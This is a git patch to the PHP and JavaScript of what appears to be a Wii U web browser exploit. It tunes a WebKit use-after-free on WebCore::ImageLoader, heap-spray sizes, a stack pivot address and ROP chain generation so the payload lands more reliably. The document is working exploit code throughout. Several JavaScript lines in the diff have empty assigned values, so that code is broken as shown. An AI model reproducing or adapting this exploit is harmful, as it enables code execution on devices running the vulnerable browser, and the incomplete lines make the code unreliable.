From 005ca5a6926976d83843952994a2927290451c45 Mon Sep 17 00:00:00 2001 From: orboditilt <45944072+orboditilt@users.noreply.github.com> Date: Tue, 8 Jan 2019 16:07:22 +0100 Subject: [PATCH] Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" --- index.php | 38 +++++++++++++++++++++++--------------- 1 file changed, 23 insertions(+), 15 deletions(-) diff --git a/index.php b/index.php index 902320f..158c68d 100644 --- a/index.php +++ b/index.php @@ -10,13 +10,20 @@ function hexentities($str) { // Settings $_REQUEST['sysver'] = '550'; // Currently hardcoded. -$payload_size = 0x8000; -$pivotAdressAdress = 0x1B800000; //r6 -$payload_srcaddr = 0x1D600000; -$ROPHEAP = $payload_srcaddr + 0x800000; -$ROPCHAIN_JS_VAR = 1; +$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary. -$USE_FIXED_PAYLOAD_LEGNTH = 0x400000; // This may be useless, but it worked once.. soo.. +$pivotAdress = 0x010ADDCC; // don't change this. +$payload_size = 0x20000; // the codegen is 128kb max. +$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying + +// These values could be adjusted to increase success rate. +$payload_srcaddr = 0x1D500000 - 0x00A10000; +$payload_spray_size = 0x400000; + +$ROPHEAP = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload + +$ropchainselect = 1; // Put codebin on heap and search it. +//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads. /** Expects a wiiuhaxx_common_cfg.php with the following variables @@ -38,20 +45,22 @@ Result: Bug is present, crash function UaF(a){ //Warning, the delta was modified ! var delta = 0x0000000; //from 0x0 to 0x04000000 step by 0x01000000 - var pivotAdress = 0x010ADDCC; + var pivotAdress = ; //5.5.2 { - var pivotAdressAdress = 0x1B800000; //r6 - var payloadAdress = 0x1D600000 + delta; + var pivotAdressAdress = ; //r6 + var payloadAdress = + delta; } - var codegenAddress = 0x01800000; - var sizeWebCoreImageLoader = 0x18; - var sprayCount = 0x1900; + var codegenAddress = 0x01800000; // don't change this. + var sizeWebCoreImageLoader = 0x18; // don't change this. + + var payloadsize = ; + var sprayCount = /payloadsize; var _4K = 0x1000; var _16K = 0x4000; var _32K = 0x8000; - + //radio is the *ONLY* type that left the freed WebCore::ImageLoader free ! a.type="radio"; @@ -78,7 +87,6 @@ function UaF(a){ dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent dv.setUint32(0x14, 0x00000000); //padding - // creates "var realROPChain = [...];" @@ -132,4 +140,4 @@ function UaF(a){ } - + \ No newline at end of file